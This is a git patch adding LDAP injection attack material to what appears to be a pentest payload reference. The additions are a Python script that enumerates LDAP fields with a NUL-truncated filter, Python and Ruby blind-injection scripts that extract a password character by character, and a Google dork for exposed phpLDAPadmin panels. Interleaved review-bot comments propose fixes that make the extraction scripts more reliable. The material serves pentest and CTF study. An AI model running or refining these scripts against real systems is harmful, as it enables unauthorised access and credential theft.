From f28f83bda69fe3d13f9b8d4b996a597125555206 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Fri, 21 Feb 2020 23:19:48 +0100
Subject: [PATCH 1/2] LDAPi: add scripts and dorks

---
 LDAP Injection/README.md | 62 +++++++++++++++++++++++++++++++++++++++-
 1 file changed, 61 insertions(+), 1 deletion(-)

diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md
index ab77077..5153b89 100644
--- a/LDAP Injection/README.md
+++ b/LDAP Injection/README.md
@@ -96,9 +96,69 @@ userPassword:2.5.13.18:=\xx\xx userPassword:2.5.13.18:=\xx\xx\xx ``` +## Scripts + +### Discover valid LDAP fields + +```python +#!/usr/bin/python3 + +import requests +import string + +fields = [] + +url = 'https://URL.com/' + +f = open('dic', 'r') #Open the wordlists of common attributes +wordl = f.read().split('\n') +f.close() + +for i in wordl: + r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla)) + if 'TRUE CONDITION' in r.text: + fields.append(str(i)) + +print(fields) +``` + +Ref. [5][5] + +### Special Blind LDAP Injection (without "*") + +```python +#!/usr/bin/python3 + +import requests, string +alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" + +flag = "" +for i in range(50): + print("[i] Looking for number " + str(i)) + for char in alphabet: + r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char) + if ("TRUE CONDITION" in r.text): + flag += char + print("[+] Flag: " + flag) + break +``` + +Ref. [5][5] + +## Google Dorks + +``` +intitle:"phpLDAPadmin" inurl:cmd.php +``` + +Ref. [5][5] + ## References * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) -* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) \ No newline at end of file +* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) +* \[5] [LDAP Injection - HackTricks][5] + +[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection From 3fad2f364c7f0577bb11a693b0b9ce8ffd989025 Mon Sep 17 00:00:00 2001 
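Review bot: The blind-extraction loop in the second Python script (`for i in range(50):` / `for char in alphabet:`) has no stop condition for a miss: once the value is fully recovered, or whenever no candidate matches, the inner loop falls through and the outer loop replays the whole alphabet for every remaining position; add an `else:` clause on the inner `for` with `break` so the search ends at the first position with no hit. The candidate set also contains `(` and `)`, which are LDAP filter metacharacters (RFC 4515): injected raw they unbalance the filter and can never yield a true condition, so those (and `*`, `\`) have to be probed in escaped form — `\28`, `\29`, `\2a`, `\5c` — if they may occur in the target value. In the first script, `f = open('dic', 'r')` … `f.close()` should become `with open('dic') as f: wordl = f.read().splitlines()`, which closes the file on error and drops the trailing empty entry that `split('\n')` produces (currently sent as a bogus `(=*)` probe). A caveat belongs next to the `\x00` payload: the NUL only truncates the filter when the application's LDAP binding hands the filter over as a C string, so on stacks that reject or escape NUL a missing "TRUE CONDITION" does not prove the attribute is absent. Both scripts also want a `timeout=` on the `requests` call so a stalled target cannot hang the scan indefinitely.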
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 21 Feb 2020 23:49:50 +0100 Subject: [PATCH 2/2] add ruby script --- LDAP Injection/README.md | 25 ++++++++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md index 5153b89..45c92db 100644 --- a/LDAP Injection/README.md +++ b/LDAP Injection/README.md @@ -136,7 +136,7 @@ flag = "" for i in range(50): print("[i] Looking for number " + str(i)) for char in alphabet: - r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char) + r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char) if ("TRUE CONDITION" in r.text): flag += char print("[+] Flag: " + flag) @@ -145,6 +145,29 @@ for i in range(50): Ref. [5][5] +```ruby +#!/usr/bin/env ruby + +require 'net/http' +alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('') + +flag = '' + +(0..50).each do |i| + puts("[i] Looking for number #{i}") + alphabet.each do |char| + r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")) + if /TRUE CONDITION/.match?(r) + flag += char + puts("[+] Flag: #{flag}") + break + end + end +end +``` + +By [noraj](https://github.com/noraj) + ## Google Dorks ```
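Review bot: The corrected line `r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)` still splices the candidate character straight into the URL, so alphabet members such as `%`, `=`, `;` and `/` reach the server only as well as requests' URL requoting happens to treat them, and a `%` followed by two hex digits can be reinterpreted as a percent-escape rather than tested literally. Passing the payload as query parameters, `r = requests.get("http://ctf.web", params={"action": "dir", "search": "admin*)(password=" + flag + char}, timeout=10)`, lets requests percent-encode every candidate consistently and the server decode it back to the literal byte. The enclosing `for` loops start and end outside this hunk.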
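Review bot: In the Ruby port, `URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")` raises `URI::InvalidURIError` as soon as `char` is one of the alphabet members the RFC 3986 parser does not accept unescaped — `"`, `{`, `}`, `^`, `[`, `]`, or a `%` not followed by two hex digits — so the script aborts mid-search instead of testing them. Build the query with the encoder instead: `uri = URI('http://ctf.web'); uri.query = URI.encode_www_form(action: 'dir', search: "admin*)(password=#{flag}#{char}")` followed by `r = Net::HTTP.get(uri)`. The loop also diverges from the Python version it mirrors: `(0..50)` is inclusive and runs 51 positions where `range(50)` runs 50, and like the Python one it never stops on a miss — using `alphabet.find` for the inner search and `break unless found` on the outer loop keeps it from replaying the alphabet for every remaining position once the value is complete.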